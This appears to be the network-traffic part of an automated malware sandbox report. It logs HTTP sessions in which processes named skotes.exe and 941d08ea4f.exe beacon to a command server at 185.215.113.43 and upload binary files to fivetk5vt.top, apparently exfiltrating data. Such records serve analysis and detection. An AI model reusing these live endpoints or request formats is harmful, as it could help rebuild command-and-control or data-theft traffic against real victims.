                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 37 69 37 75 33 6a 47 65 33 53 4f 64 4f 62 52 79 6d 66 45 74 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 69 62 6f 6e 6f 64 6f 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a cd 4f 47 d6 06 56 95 b3 4e eb 81 d3 14 d5 7f b2 05 54 7c 6f 82 f2 a9 19 a5 8a 81 fb 54 9f e3 a6 2d 42 ba 28 25 ce da 08 de 07 a3 46 a3 2e a2 bd 4d 99 0a 7d b1 f3 08 00 fb a8 6f 66 ed a9 7b 83 43 77 d0 a3 90 f4 6e b7 14 bc 95 c2 10 91 fd 65 7c 6f 76 fe e0 f5 6a 87 bd 9e 6b 34 5f d4 1c 03 37 ac 0d 82 61 da 08 7c 53 6f 38 4b 6e 0b e7 59 34 ef 93 f4 09 48 1d 4a 91 e0 16 6f c7 48 b8 7e 9e 18 8a 60 b4 03 1c 66 da 99 3b ce 41 d8 a6 4a ff 16 c6 34 c4 18 a4 df 05 c0 17 c7 01 a7 c6 e2 36 e4 d6 a8 b4 7e 44 6a 64 3b d8 f5 2e ee f7 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: --------------------------p7i7u3jGe3SOdObRymfEtUContent-Disposition: form-data; name="file"; filename="Bibonodob.bin"Content-Type: application/octet-streamOGVNT|oT-B(%F.M}of{Cwne|ovjk4_7a|So8KnY4HJoH~`f;AJ46~Djd;.ca7^<n'0g?Z+_}?VX|ioWSA'{zhJM^E?l{pwuI^)]+$\I!kt}}zR:=T"XkM/T @VzV!_MsSSs94oT;9j<{Rs9X`RtFB~={XUfP|;rA~<KA%i~ZxY1+6Pb5^ *yl}T\&\&"WH/+w"q%4uR`2lPQ+);<p5_3]4>*`;YlHN$?R`Ymit2spT8"'?[PVBEI|s]SdqG3^p8xtHw4,VVsEer.a(8.`(zyPYrP:W*SRkYnFu'%8oA/U3~\.%v_}P+&&5e|LnXFn [TRUNCATED]
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.256140947 CET4944OUTData Raw: 3b ad 67 26 64 07 52 25 52 4f fd 7e 30 09 be 80 8b 33 0c 4d f7 6a 87 0c b5 54 ce da 1b f0 18 df a7 ce 6f 59 07 42 c4 9f 18 56 43 d2 91 2c ab 68 4e c9 14 05 61 9f 47 76 cd 4c 68 07 7d 7b 17 be 20 9a 2f 6d bf 6e 5e dd 01 6b 85 c8 72 1f 8c 25 89 20
                                                                                                                                                                                                                                                          Data Ascii: ;g&dR%RO~03MjToYBVC,hNaGvLh}{ /mn^kr% >'"Qk<-\FPZLunae-UgZlyTp&/Zf90AdU1}qZ6}O9Xa0nM%2R/"xk8(7D2g~Duy+93#HO
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.256191969 CET19776OUTData Raw: 0d f7 bc 54 67 c6 a7 c2 23 5c 91 53 f6 3d ed d7 d2 f9 54 b6 23 8e c4 4d 3d 56 a3 63 e7 26 df 76 ee 17 91 27 3a 76 bd 2b c2 46 6d af b7 15 99 5c e3 40 06 49 86 ad f9 ac 55 bb 8d c3 df 36 4a e3 50 a7 f6 a2 48 c8 db 4c a0 5e cc 85 ee 4a ad 84 4f 2c
                                                                                                                                                                                                                                                          Data Ascii: Tg#\S=T#M=Vc&v':v+Fm\@IU6JPHL^JO,),k9 F/ZlD06][/9[k)YF67A}=ju';#$v(3K7:+Q;q QTC).@/ W"#Q9
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.375726938 CET2472OUTData Raw: e6 56 86 c5 30 c6 2c e1 75 20 d9 4a c8 76 1d 66 e6 ad ed 3f cc ba c0 58 71 df d8 5f 57 6e 8e 37 44 71 e1 3b fd bc 9b 8b 7c b0 84 f3 dc 22 fb d1 da b2 03 44 4e 6f 38 7a 85 f9 fd 60 be 32 12 6b 29 2a 7b 20 4e 60 4a 4e d4 f4 3c af 50 00 c4 95 81 37
                                                                                                                                                                                                                                                          Data Ascii: V0,u Jvf?Xq_Wn7Dq;|"DNo8z`2k)*{ N`JN<P7`dXQNM>[tY$Z%+Y Qrl,_e.DbQRfA?TWI-I,J6_~N9=(`1P[E\?-/(a%H`iZP2U;Uk+3|
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.375827074 CET2472OUTData Raw: 6d d8 b1 52 a9 35 eb 98 b7 78 b3 e3 14 d6 ab 7f d8 41 f8 6f c0 ee 13 d1 4c 48 28 7c d9 b9 65 74 76 55 5d 41 2e 80 23 f5 cb df 31 82 a5 fe 1c f6 d6 1e 86 ae e6 5f e0 b6 dd 1f 25 78 bc 46 56 f3 bf 0d d9 67 a5 ee 4a 4a dd 81 df 53 2c fa e4 3b 74 60
                                                                                                                                                                                                                                                          Data Ascii: mR5xAoLH(|etvU]A.#1_%xFVgJJS,;t`F$^M(2:c?%O{C5e|U 5z"@;q5C. <H7FP5>[Zhf)yJBeM}yBOKi{E.uR0Yq
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.375919104 CET4944OUTData Raw: ce 1b e2 b8 ab 1e 6f e4 4a 78 39 2f 01 be e9 e9 24 4b 49 42 25 17 61 d8 37 4c 63 d2 ec 8d 07 2f 25 65 a0 58 62 36 4c 8d 71 51 8e 66 83 cf 8e 9b c7 26 2b 2b f5 ab 06 5c 35 d1 d4 df 15 99 0c 66 55 6b 8b 8c 27 c6 38 cf 01 93 96 59 cf dc 7e 29 aa 5f
                                                                                                                                                                                                                                                          Data Ascii: oJx9/$KIB%a7Lc/%eXb6LqQf&++\5fUk'8Y~)_Qq")]gcn@o!Z0(VH?1^+U<s|GL<GO;kd$<*,mrxP5wT'3N^]1vNe?`0%)3:tuVA
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.375983953 CET4944OUTData Raw: a5 c9 0c 28 44 b7 56 1d 69 b3 39 70 a1 5d c4 e9 3b 6d f4 9f 62 db 86 d2 ea 95 2b 7a 1a 4c 96 4e 73 d3 7a 05 8b a2 ab 31 a7 b2 4a 28 75 37 eb 5c 0b 14 f2 c4 43 91 e2 d4 1c c9 e7 f7 52 de 01 bb 82 c5 8e 82 07 82 2a 91 e4 85 9e f0 da 47 4f c6 44 cb
                                                                                                                                                                                                                                                          Data Ascii: (DVi9p];mb+zLNsz1J(u7\CR*GODk`Wha%z[iRN,F4w&$G{dakOg?f3-Y=eF:[7G*nF7uyY)^OBYJ%dOItOSG=cA'
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.416187048 CET27192OUTData Raw: 0e a9 28 6d 0d 15 95 4b 3a d6 1c d4 76 55 80 c9 8a 48 b1 97 43 ef f6 c4 d5 e0 41 2d 7e 8a 84 46 fb 9c 0b 7f b8 58 fa d6 da b6 5c 70 ab f4 67 50 2e b4 61 a6 86 65 cb b8 ca 12 d1 d4 fa 68 94 c3 6d 3a ce c6 dd 23 d0 97 a5 8d b1 8c 48 93 1d 34 1f 95
                                                                                                                                                                                                                                                          Data Ascii: (mK:vUHCA-~FX\pgP.aehm:#H4>]Iz3D&$Lr^&.vyKo[nP#>g..}M?jL}#zg0YJIY,{_;>_(&t@0$,ICBN:X6sO7aT<!u[vj$I;
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.535989046 CET5594OUTData Raw: cd dc f0 9c 01 1a 7b ff f8 09 ac a1 bd 93 1c 42 f6 8c bf de 0c 55 d2 ac 7f 2d ac 78 6d a3 36 d6 54 42 7e 3b 89 50 17 22 ad 5b 61 2c 96 34 3b 19 e8 7d 03 3e 99 a8 3e 17 9b 3e 80 5c c2 f4 17 8a f8 16 b7 8d a1 d5 6b 08 97 13 29 45 6f d3 15 92 5a db
                                                                                                                                                                                                                                                          Data Ascii: {BU-xm6TB~;P"[a,4;}>>>\k)EoZ~!mlOu"i6+}$_[g>s[1&s*JHQy7w~L`B=Mz!lqzW%*&~qZ4~Ws@0PpVzZ'}X<sd
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:20.024132967 CET255INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          server: nginx
                                                                                                                                                                                                                                                          date: Thu, 19 Dec 2024 13:21:19 GMT
                                                                                                                                                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                                                                          x-ratelimit-limit: 30
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 25
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1734615673
                                                                                                                                                                                                                                                          etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                          Data Raw: 4f 4b
                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          24192.168.2.449856185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:19.594182968 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:20.935950041 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          25192.168.2.449868185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:23.011291027 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:24.348138094 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          26192.168.2.449888185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:27.625011921 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:28.965419054 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          27192.168.2.449900185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:30.742211103 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:32.087543011 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:31 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          28192.168.2.449906176.53.146.212806440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:32.088799953 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                          Host: fivetk5vt.top
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 23410
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------rH3WDtdKAHfKI76Nide4X8
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 48 33 57 44 74 64 4b 41 48 66 4b 49 37 36 4e 69 64 65 34 58 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 69 6c 6f 71 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 9f 87 29 2b b4 64 e3 c1 9b 89 b6 a9 ef 52 2b 18 5b 93 01 ef 48 2d fa aa 17 d7 49 3b bc ee cd 2b 7b 36 57 2b 82 b8 16 78 12 86 6e e9 b8 ac 2c a4 91 08 7c a8 db 47 dd 40 b7 0e 27 42 c5 17 9f 4f 0b 0d f1 2b bd 88 fc e5 97 ee 69 23 6c 66 93 4d 17 5a 48 a8 97 72 a4 fe 56 1d a9 20 9d fc 9d 0b ad 5c 0a de dc e6 51 a0 64 82 9a 85 56 d0 1b d6 ae 6d 45 3d 7a 3d c8 5c 5a 3e 34 d0 11 b6 f0 26 27 43 d6 09 02 d4 d2 97 b1 38 c0 61 10 8e 36 ae 07 c8 28 67 e8 b9 90 a1 21 5d 17 0f e1 1e 6d 6c 93 7c ec df 0a bc 49 6e 96 fe 90 23 6c ca 71 8a 93 7d [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: --------------------------rH3WDtdKAHfKI76Nide4X8Content-Disposition: form-data; name="file"; filename="Qiloqo.bin"Content-Type: application/octet-stream)+dR+[H-I;+{6W+xn,|G@'BO+i#lfMZHrV \QdVmE=z=\Z>4&'C8a6(g!]ml|In#lq}$};740~%`.9d|},A1'!i$x X&o#SQ5~]3t"MpF3JqwP?i`q|$R54*!(cPnvu/4Xyb+lb$xF|=1 2duzSy8}].@xU+%J4\8Spc yyq'Ffgc7Wy~BY%JNK4#d,~Ko%^!+>h`o=hw"4BQMV<`|D'#yb3WF(gI(bGyN%!'zf\22N#O^]R)/V`HwJw?4[<OFR%~jCdH<sx~">1t4W]"]Q]E"ky-P"Le%j-vY&D+UxbBx5Ls'co:B/%U$Z\%Kc :m#k [TRUNCATED]
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:32.208741903 CET4944OUTData Raw: 72 ec 49 44 14 0f d7 1e c4 2a e4 49 cb f7 59 39 e2 75 85 fc 4a 1a a1 66 50 22 86 f8 af 8e 6d 08 92 05 7c e2 86 04 26 6b 7f 49 8a c4 df 87 35 06 25 45 52 24 b6 b8 dc ad 44 c7 cd e2 8f cb fe d4 aa 7a 92 cf 58 79 8d f8 5c f3 38 0a 10 08 7d 1d 05 97
                                                                                                                                                                                                                                                          Data Ascii: rID*IY9uJfP"m|&kI5%ER$DzXy\8}+,iQd;<S7sEy'W_3aUM_i&ZQbXvC$JLev_8Nf:w.QO.6OAf__hR?~7lhu( d##V:j!
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:32.208851099 CET2472OUTData Raw: c4 a7 64 69 54 c0 be 1e 21 ef 32 d5 dd 55 39 0b a0 0e e7 2a c4 82 4a a7 79 5a 67 02 ff e5 5b e1 93 0a 2d 8e e8 fa e8 45 71 80 50 49 80 c5 45 08 4c 6f b5 45 15 dc 3b 1b 06 a5 12 ab 1b 75 f2 d6 bd 40 95 3c e1 5c 5e 9b 65 63 fc e0 21 16 e1 23 b3 c4
                                                                                                                                                                                                                                                          Data Ascii: diT!2U9*JyZg[-EqPIELoE;u@<\^ec!#4QH40[^TirgI);v!}+43]6r_zT1jlt"7G,YZ8~70utc&(6a]1k7H` sCrrvhGfVPXha~}!
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:32.208865881 CET2472OUTData Raw: 64 6a 4c 23 31 31 94 37 37 37 02 24 88 81 fd 67 7f 89 cb 12 14 79 6e 6b 99 97 c2 ff 4c 2d 38 81 97 ce fa 7a 08 5a df a9 c9 2e 56 03 f7 95 fd 33 15 cb 49 53 34 92 5e a2 34 12 a7 3f 1a 2a 58 52 4a 4b e0 cd 6a 14 36 f7 83 34 57 ef 46 a5 1b 18 d3 05
                                                                                                                                                                                                                                                          Data Ascii: djL#11777$gynkL-8zZ.V3IS4^4?*XRJKj64WF{<V-p`kbma 5l:J0!{}$@up6\70*020~\Yr \>=g"Z6g[xRg[%EKmJa$)d`4:"
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:32.208961964 CET1343OUTData Raw: c0 71 f4 3a 16 fa 01 e3 43 a3 2a de 60 62 32 40 41 bd f2 46 68 93 33 85 f1 d0 6f a1 0a 14 46 ac 2c dd 55 5b 3b 71 1d a9 8c 1d c6 50 4c f8 2d 0f b2 18 6f 96 a6 29 22 d6 50 85 82 61 84 8e 51 d8 be 7e 0c 9c 49 a5 be a7 4d 1d ff ad 53 f4 1a 56 d3 57
                                                                                                                                                                                                                                                          Data Ascii: q:C*`b2@AFh3oF,U[;qPL-o)"PaQ~IMSVW2Y[W$P~Um'YiI7asrL=xy/=NNH%L4wF_I2C0CC`[sWHq#Vu_;=4%@R5XlOU=TP"FN
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:33.795486927 CET255INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          server: nginx
                                                                                                                                                                                                                                                          date: Thu, 19 Dec 2024 13:21:33 GMT
                                                                                                                                                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                                                                          x-ratelimit-limit: 30
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 24
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1734615673
                                                                                                                                                                                                                                                          etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                          Data Raw: 4f 4b
                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          29192.168.2.449912185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:33.738605976 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:35.129792929 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          30192.168.2.449914176.53.146.212806440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:35.076384068 CET196OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                                                                                                                                                                                                                          Host: home.fivetk5vt.top
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 56
                                                                                                                                                                                                                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 62 55 62 43 33 77 56 30 6b 50 32 59 73 49 52 4d 31 37 33 34 36 31 34 34 34 38 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d
                                                                                                                                                                                                                                                          Data Ascii: { "id1": "bUbC3wV0kP2YsIRM1734614448", "data": "Done2" }
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:36.670928955 CET141INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          server: nginx/1.22.1
                                                                                                                                                                                                                                                          date: Thu, 19 Dec 2024 13:21:36 GMT
                                                                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          content-length: 4
                                                                                                                                                                                                                                                          Data Raw: 6f 6b 61 79
                                                                                                                                                                                                                                                          Data Ascii: okay


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          31192.168.2.449920185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:36.891915083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:38.240120888 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:38 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          32192.168.2.449932185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:40.238291025 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
